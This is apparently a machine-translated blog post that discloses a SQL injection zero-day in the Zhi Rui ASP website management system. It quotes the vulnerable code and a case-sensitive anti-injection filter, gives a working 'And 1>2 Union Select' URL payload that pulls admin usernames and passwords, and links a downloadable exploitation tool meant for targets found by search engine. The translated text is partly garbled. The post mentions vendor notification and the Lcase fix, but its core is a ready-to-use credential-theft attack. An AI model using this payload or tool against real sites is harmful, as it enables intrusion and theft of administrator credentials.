Zhi Rui's website management system kills 0 days

Why?

Why is it because all of his code is self-written? Currently, we have tested and killed the enterprise website management system and the school website management system.
Not to mention, look at the code. first look at the info_show.asp file code. Other files are similar
Dim ClassId, TopID, ClassName, Inid, SeoTitle, LePl
ClassId = request. QueryString ("ClassId") // ClassId is used for filtering.
TopID = request. QueryString ("TopID ")
Inid = int (request. QueryString ("InfoId "))
LePl = Request. form ("LePl ")
Call SeoUi ("zhi_rui_E_io_Class", "info", ClassId) // Call the self-written function SeoUi to bring it to the database for query.
Call Kio ("zhi_rui_E_io", "info", Inid)
However, we started to call -- # include file = "Include/Nsql. asp"-anti-injection file. If it is bad, we should look at the code on this anti-injection file;
Dim SQL _inj, SQL _Get, SQL _Data, SQL _Post
SQL _inj = split (DataNsql, "| ")
If Request. QueryString <> "Then
For Each SQL _Get In Request. QueryString
For SQL _Data = 0 To Ubound (SQL _inj)
If instr (Request. QueryString (SQL _Get), SQL _Inj (SQL _DATA)> 0 Then
Response. Write "Script Language = javascript> alert (Note: Do not submit illegal requests! Http: // Www.ZhiRui.net); history. back (-1) Script>"
Response. end ()
End if
Next
Next
End If
If Request. Form <> "" Then
For Each SQL _Post In Request. Form
For SQL _Data = 0 To Ubound (SQL _inj)
If instr (Request. Form (SQL _Post), SQL _Inj (SQL _DATA)> 0 Then
Response. Write "Script Language = javascript> alert (Note: Do not submit illegal requests! Http: // Www.ZhiRui.net); history. back (-1) Script>"
Response. end ()
End if
Next
Next
End if

It seems that the injection code is normal and there is no problem, but there is still a problem. Take a closer look at this. if instr (Request. Form (SQL _Post), SQL _Inj (SQL _DATA)> 0 Then
What is missing, that is, the Lcase function. That is to say, the current anti-injection only defends against and, but does not defend against And. The instr function only returns the character location and does not compare the case. The fix is to add the Lcase function And change it to Lcase (Request. form (SQL _Post). After knowing the cause of the problem, let's take a look at the characters filtered out, dataNsql = "and | exec | insert | select | delete | update | count | chr | mid | master | truncate | char | declare | set | from | ="
Note: The Last One filters out the equal signs because they cannot be converted to uppercase or lowercase, but it's okay. I don't need to use the equal signs. Just like. It's okay if it's bigger than a smaller number. An injection statement is provided.
2% 20 Union % 20 Select % 201, Password % 2 Badminname % 20 From % 20zhi_rui_e_manage "> http://test.3est.com/info_Show.asp? InfoId = 175 & ClassId = 27% 20And % 201> 2% 20 Union % 20 Select % 201, Password % 2 Badminname % 20 From % 20zhi_rui_e_manage
Because the equal sign is filtered out, I used 1> 2 here to make him wrong and execute the following Union query.
The vulnerability has been announced to the official team and has benefited a lot from talking with the official team, so this hole has been postponed for a few days. In the past few days, I wrote a exploitation program,

Enter infoid and classid as the IDs you see in the search engine,
Download it to my online storage. For this poor little space, it won't be passed here, and the source code and tools are all there. Note that I added a sound to the program, which may be a little too big and I can't help it, to make the program speak,
Aspx "> http://cid-31cbc2374bc1f024.skydrive.live.com/home.aspx
In the tool folder, zhirui.rar